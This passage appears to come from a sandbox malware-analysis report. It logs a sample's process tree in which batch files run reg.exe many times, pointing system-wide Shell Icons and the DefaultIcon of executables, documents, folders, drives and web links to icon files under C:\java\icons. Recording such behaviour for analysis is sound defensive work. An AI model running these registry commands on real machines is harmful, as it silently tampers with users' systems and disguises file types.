C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 47 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 48 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 49 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 50 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 51 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 52 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 53 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 54 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 55 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 56 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 57 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 58 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 59 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 60 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 61 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 62 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 63 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 64 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 65 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 66 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 67 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 68 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 69 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 70 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 71 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 72 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 73 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 74 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 75 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 76 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 77 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 78 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 79 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 80 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 81 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 82 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 83 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 84 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 85 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 86 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 87 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 88 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 89 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 90 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 91 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 92 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 93 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 94 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 95 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 96 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 97 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 98 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 99 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 100 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 101 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 102 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 103 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 104 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 105 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 106 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 107 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 108 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 109 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 110 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 111 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 112 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 113 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 114 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 115 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 116 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 117 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 118 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 119 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 120 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 121 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 122 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 123 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 124 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 125 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 126 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 127 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 128 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 129 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 130 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 131 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 132 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 133 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 134 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 135 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 136 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 137 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 138 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 139 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 140 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 141 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 142 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 143 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 144 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 145 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 146 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 147 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 148 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 149 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 150 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f11⤵
- Modifies File Icons
-
C:\java\protection\start\starticons.exeC:\java\protection\start\starticons.exe7⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6AF0.tmp\6AF1.tmp\6AF2.bat C:\java\protection\start\starticons.exe"8⤵
-
C:\java\protection\icons.exeC:\java\protection\icons.exe9⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6CE4.tmp\6CE5.tmp\6CE6.bat C:\java\protection\icons.exe"10⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
- Modifies system executable filetype association
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\batfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
- Modifies system executable filetype association
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\blendfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\dllfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\AutoHotkeyScript\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\pngfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\jpegfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\giffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\bittorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\cmdfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\dbfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Drive\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\DVD\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\docxfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\http\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Folder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\https\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\icofile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\inifile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\mscfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\ms-excel\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\ms-publisher\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\ms-word\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\ms-access\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\MSInfoFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f11⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\Python.File\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f11⤵
-
